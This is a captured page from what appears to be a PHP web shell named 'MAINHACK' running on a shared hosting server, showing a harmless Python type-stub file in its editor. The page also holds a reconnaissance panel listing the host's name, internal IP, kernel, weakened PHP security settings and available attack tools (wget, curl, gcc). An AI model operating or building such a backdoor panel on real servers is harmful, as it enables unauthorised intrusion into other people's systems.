[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: _IntegerBase.pyi
File is not writable. Editing disabled.
from typing import Optional, Union, Callable RandFunc = Callable[[int],int] class IntegerBase: def __init__(self, value: Union[IntegerBase, int]): ... def __int__(self) -> int: ... def __str__(self) -> str: ... def __repr__(self) -> str: ... def to_bytes(self, block_size: Optional[int]=0, byteorder: str= ...) -> bytes: ... @staticmethod def from_bytes(byte_string: bytes, byteorder: Optional[str] = ...) -> IntegerBase: ... def __eq__(self, term: object) -> bool: ... def __ne__(self, term: object) -> bool: ... def __lt__(self, term: Union[IntegerBase, int]) -> bool: ... def __le__(self, term: Union[IntegerBase, int]) -> bool: ... def __gt__(self, term: Union[IntegerBase, int]) -> bool: ... def __ge__(self, term: Union[IntegerBase, int]) -> bool: ... def __nonzero__(self) -> bool: ... def is_negative(self) -> bool: ... def __add__(self, term: Union[IntegerBase, int]) -> IntegerBase: ... def __sub__(self, term: Union[IntegerBase, int]) -> IntegerBase: ... def __mul__(self, term: Union[IntegerBase, int]) -> IntegerBase: ... def __floordiv__(self, divisor: Union[IntegerBase, int]) -> IntegerBase: ... def __mod__(self, divisor: Union[IntegerBase, int]) -> IntegerBase: ... def inplace_pow(self, exponent: int, modulus: Optional[Union[IntegerBase, int]]=None) -> IntegerBase: ... def __pow__(self, exponent: int, modulus: Optional[int]) -> IntegerBase: ... def __abs__(self) -> IntegerBase: ... def sqrt(self, modulus: Optional[int]) -> IntegerBase: ... def __iadd__(self, term: Union[IntegerBase, int]) -> IntegerBase: ... def __isub__(self, term: Union[IntegerBase, int]) -> IntegerBase: ... def __imul__(self, term: Union[IntegerBase, int]) -> IntegerBase: ... def __imod__(self, divisor: Union[IntegerBase, int]) -> IntegerBase: ... def __and__(self, term: Union[IntegerBase, int]) -> IntegerBase: ... def __or__(self, term: Union[IntegerBase, int]) -> IntegerBase: ... def __rshift__(self, pos: Union[IntegerBase, int]) -> IntegerBase: ... def __irshift__(self, pos: Union[IntegerBase, int]) -> IntegerBase: ... def __lshift__(self, pos: Union[IntegerBase, int]) -> IntegerBase: ... def __ilshift__(self, pos: Union[IntegerBase, int]) -> IntegerBase: ... def get_bit(self, n: int) -> bool: ... def is_odd(self) -> bool: ... def is_even(self) -> bool: ... def size_in_bits(self) -> int: ... def size_in_bytes(self) -> int: ... def is_perfect_square(self) -> bool: ... def fail_if_divisible_by(self, small_prime: Union[IntegerBase, int]) -> None: ... def multiply_accumulate(self, a: Union[IntegerBase, int], b: Union[IntegerBase, int]) -> IntegerBase: ... def set(self, source: Union[IntegerBase, int]) -> IntegerBase: ... def inplace_inverse(self, modulus: Union[IntegerBase, int]) -> IntegerBase: ... def inverse(self, modulus: Union[IntegerBase, int]) -> IntegerBase: ... def gcd(self, term: Union[IntegerBase, int]) -> IntegerBase: ... def lcm(self, term: Union[IntegerBase, int]) -> IntegerBase: ... @staticmethod def jacobi_symbol(a: Union[IntegerBase, int], n: Union[IntegerBase, int]) -> IntegerBase: ... @staticmethod def _tonelli_shanks(n: Union[IntegerBase, int], p: Union[IntegerBase, int]) -> IntegerBase : ... @classmethod def random(cls, **kwargs: Union[int,RandFunc]) -> IntegerBase : ... @classmethod def random_range(cls, **kwargs: Union[int,RandFunc]) -> IntegerBase : ...
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.14 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A